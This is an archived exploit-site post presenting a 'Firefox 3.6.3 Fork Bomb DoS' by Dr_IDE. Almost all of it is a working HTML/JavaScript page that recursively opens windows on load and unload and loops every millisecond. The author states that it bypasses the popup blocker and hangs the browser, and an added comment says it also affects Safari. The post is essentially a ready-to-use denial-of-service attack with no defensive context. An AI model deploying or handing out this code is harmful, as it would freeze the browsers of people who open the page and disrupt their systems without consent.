Home / os / win7

Firefox 3.6.3 Fork Bomb DoS

Posted on 03 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Firefox 3.6.3 Fork Bomb DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================== Firefox 3.6.3 Fork Bomb DoS =========================== &lt;html&gt; &lt;script&gt; loop1(); var a = ('javascript:&quot;&lt;html&gt;&lt;head&gt;&lt;title&gt;Dr_IDEs FireFox Fork Bomb!&lt;/title&gt;&lt;/head&gt;&lt;body onunload=\&quot;javascript:window.open(window.location);window.open(window.location)\&quot; onload=\&quot;javascript:window.open(window.location);window.open(window.location)\&quot;&gt;&lt;/body&gt;&lt;/html&gt;&quot;'); function loop1() { window.open(a); setInterval(loop1,1); } &lt;/script&gt; &lt;body onload=&quot;javascript:loop1()&quot;&gt;&lt;/body&gt; &lt;/html&gt; &lt;!-- Firefox Fork Bomb DoS By: Dr_IDE Tested on: Windows 7 with Firefox 3.6.3 Note: This will &quot;bypass&quot; the popup blocker and still hang the browser. EDB Comment: This also works for Safari according to Dr_IDE --&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP